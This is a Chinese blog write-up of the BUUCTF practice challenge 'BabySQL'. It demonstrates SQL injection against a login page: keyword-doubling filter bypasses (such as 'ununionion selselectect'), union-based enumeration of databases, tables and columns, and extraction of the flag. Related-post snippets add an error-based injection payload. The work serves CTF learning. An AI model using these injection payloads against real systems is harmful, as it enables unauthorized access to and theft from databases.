[极客大挑战 2019]BabySQL 获取元数据CTF实例

最新推荐文章于 2024-03-28 00:22:57 发布
最新推荐文章于 2024-03-28 00:22:57 发布
阅读量313 收藏
点赞数
分类专栏: Web刷题记录 文章标签: php sql mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/109159071
版权

[极客大挑战 2019]BabySQL

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

一、收集信息

首先打开网页
在这里插入图片描述
它说做了过滤,别管它!登录界面直接试万能密码’or 1='1
在这里插入图片描述
发现or给过滤为空了,这里就直接能想到用双写来绕过,但是不用急,先做做Fuzz测试
主要过滤了select、union、or、from、where这些函数

再配合双写来进行联合查询看看

check.php?username=admin&password=a'ununionion selselectect 1 #

在这里插入图片描述
发现报错了,说的是列数不对
加列数加到第三列时就够了

check.php?username=admin&password=a'ununionion selselectect 1,2,3 #

在这里插入图片描述

二、构造payload

现在知道了列数,以及被过滤掉的函数,就可以开始构造payload了!
爆破全部数据库名

check.php?username=admin&password=a%27ununionion+selselectect+1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata)+%23

在这里插入图片描述

这里需要注意的一个小坑!"information"中的for里面包含or字符串,会给过滤掉,不仅要对它进行双写来绕过,也需要将整句语句用括号括起来加以表示,不然会出现报错!

爆破全部表名
爆破数据库名后,能看到一个ctf的数据库,对它进行列举

check.php?username=admin&password=a%27ununionion+selselectect+1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema="ctf"+%23

在这里插入图片描述
爆破字段

check.php?username=admin&password=a'ununionion selselectect 1,2,group_concat(column_name)frfromom(infoorrmation_schema.columns)whwhereere table_name="Flag" #

在这里插入图片描述
爆破数据
知道这些就可以爆出flag了

check.php?username=admin&password=a'ununionion selselectect 1,2,flag

在这里插入图片描述

总结

需要注意对字符的过滤和爆破语句的利用
爆破数据库名 :select schema_name from information_schema.schemata
爆破表名 :select table_name from information_schema.tables where table_schema=[database]
爆破列名 :select column_name from information_schema.columns where table_name=[table]
感谢BUUCTF提供的平台练习!

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF学习笔记——[挑战 2019]BabySQL
Obs_cure的博客
02-09 1377
一、[挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
CTFShow-周末大挑战parse-url篇Writeup
05-19
CTFShow--周末大挑战parse_url篇Writeup
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2655
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
buuctf Babysql
zzqzzq11的博客
08-06 232
buuctf
BabySQL【2019挑战
最新发布
I_WORM的博客
03-28 1045
构造payload:username=3'+||+extractvalue(1,concat(0x7e,mimidd((seselectlect+group_concat(username,':',passwoorrd)+frfromom+b4bsql)+,181,30),0x7e))=1--+发现返回了完整的错误提示,一开始没明白是什么意思,更换payload测了几次后才发觉or应该被过滤了,尝试了or 'a'='a'--+ or '1'='1' --+;既然能成功注入了,又获得了完整的错误提示。
buuctf-[挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5052
buuctf-[挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
[挑战 2019]BabySQL
wuuconix's blog
03-10 963
[挑战 2019]BabySQL 考点: SQL关键字过滤 双拼绕过 这道题延续之前的LoveSQL 的解体方法,思路一模一样,但是这道题过滤了许多关键字。比如union or order by from select 等等 下面是我做题时总结出来的如何判断某关键字被过滤的办法,比如我们现在判断or 有没有被过滤 check.php?username=-1' ors ;%23&password=1234 我在or后加了个s ,不管有没有被过滤,都会报错,我们看看它的报错 Yo
[GXYCTF2019]BabySQli 1
m0_62879498的博客
04-13 3888
[GXYCTF2019]BabySQli 1 我们先判断注入点,发现注入点在 用户名('or 1=1-- q) 发现 or 被过滤掉,我们尝试使用大小写绕过,成功。 判断字段数:'OR 1=1 order by 1 – q 使用联合查询 'union select 1,2,3-- q 发现没有直接将回显返回出来 理论上来说,联合查询是不可以使用的 同时,这道题是会有返回了错误信息,是不是感觉报错注入在向自己招手? 想尝试的童鞋可以故意使用错误的sql语句看是否有错误信息回显 但痛苦的是,在本关过滤掉
国科大web安全中期CTF.pdf
11-22
国科大web安全中期CTF
D^3CTF 2019 Challenges.zip
08-16
D^3CTF 2019 CTF
国科大web安全技术期末CTF.pdf
11-22
国科大web安全技术期末CTF
2019领航杯CTF题目
11-25
2019领航杯CTF的原题,文件恢复和DNS两题没有
[挑战 2019]BabySQL1 思路细致讲解
hac1ker123的博客
05-19 626
[挑战 2019]BabySQL1 思路细致讲解
攻防世界(web高手进阶区)——21~31题
weixin_43610673的博客
04-11 2973
FlatScience 点开的页面中的链接都是下载pdf文件的,都是英文论文什么的,先不管 测试/.git/,回显404,但有robots.txt 两个登录界面,猜测flag应该是登录admin.php拿到,通过对login.php进行注入得到密码。 login.php源码注释有提示 访问/login.php?debug,得到源码 是个sqlite的数据库,密码通过sha1加密还加了sa...
每日练习-[NSSCTF 2022 Spring Recruit]babysql
m0_68113265的博客
08-20 373
【代码】每日练习-[NSSCTF 2022 Spring Recruit]babysql
[挑战 2019]BuyFlag
07-29
- *2* *3* [CTF学习笔记——[挑战 2019]BuyFlag](https://blog.csdn.net/Obs_cure/article/details/113820888)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值